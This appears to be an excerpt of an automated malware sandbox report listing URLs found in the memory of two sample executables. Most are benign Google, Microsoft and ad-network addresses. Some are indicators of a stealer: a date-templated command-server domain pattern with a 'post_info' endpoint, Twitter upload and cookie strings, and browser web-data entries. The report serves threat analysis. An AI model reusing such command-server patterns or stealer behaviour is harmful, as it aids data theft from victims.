Source: 56BB1610C0318054.exe, 00000004.00000003.376130421.0000000003D30000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx-
Source: 56BB1610C0318054.exe, 00000004.00000003.373958396.0000000003D43000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxX
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxq
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 56BB1610C0318054.exe, 00000002.00000002.414835494.000000000344F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9
Source: Cyfj6XGbkd.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: Cyfj6XGbkd.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEE
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373650211.0000000003D49000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/c
Source: 56BB1610C0318054.exe, 00000004.00000003.373650211.0000000003D49000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 56BB1610C0318054.exe, 00000004.00000003.373930371.0000000003D44000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appQAB
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appQAB%HRQ
Source: 56BB1610C0318054.exeString found in binary or memory: https://drive.google.com/drive/settings
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settingsr
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 56BB1610C0318054.exeString found in binary or memory: https://mail.google.com/mail
Source: 56BB1610C0318054.exeString found in binary or memory: https://mail.google.com/mail/#settings
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settingsox
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: 56BB1610C0318054.exeString found in binary or memory: https://payments.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsdVA0HSE
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 56BB1610C0318054.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsJtW23HRG
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx7w
Source: 56BB1610C0318054.exe, 00000002.00000003.409306143.0000000004128000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashAM
Source: 56BB1610C0318054.exe, 00000002.00000003.390531939.0000000003D75000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.371026243.0000000003813000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376084985.0000000003D38000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp, ecvFEAD.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=1824632442.1601478955
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 56BB1610C0318054.exe, ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorSV4HR
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/calend
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly)
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingY
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyOnTP1HRE
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetingsn
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 56BB1610C0318054.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwritecon
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373528673.0000000003D3E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.emaila
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
